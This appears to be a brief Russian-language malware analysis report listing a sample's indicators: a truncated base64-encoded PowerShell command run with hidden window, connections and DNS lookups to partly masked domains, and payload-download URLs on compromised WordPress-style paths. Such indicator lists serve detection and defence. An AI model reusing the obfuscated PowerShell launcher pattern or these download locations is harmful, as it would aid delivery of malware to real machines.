Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB3AGIAegBzAGoAUwA9ACcAegA5ADMAUQA3AEUAJwA7ACQAWABvADUAagBmAHoAdgB6ACAAPQAgACcAOAAyADkAJwA7ACQAZgB0AEUAcABjAHUAPQAnAG8AegBoADUAXwBSACcAOwAkAGsAcgBaAFAAegBKADUARQA9ACQAZQBuAHYAOgB1AHMAZ...
- 'an###iblaj.com':80
- 'an###iblaj.com':443
- 'co####caagencia.com':443
- 'qo###soft.com':80
- http://www.an###iblaj.com/wp-includes/fyjf4/
- http://an###iblaj.com/wp-includes/fyjf4/
- http://qo###soft.com/gnm2inc49275/
- 'an###iblaj.com':443
- DNS ASK an###iblaj.com
- DNS ASK te####ge.pcoder.net
- DNS ASK co####caagencia.com
- DNS ASK qo###soft.com
- DNS ASK qu####creative.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB3AGIAegBzAGoAUwA9ACcAegA5ADMAUQA3AEUAJwA7ACQAWABvADUAagBmAHoAdgB6ACAAPQAgACcAOAAyADkAJwA7ACQAZgB0AEUAcABjAHUAPQAnAG8AegBoADUAXwBSACcAOwAkAGsAcgBaAFAAegBKADUARQA9ACQAZQBuAHYAOgB1AHMAZ...' (со скрытым окном)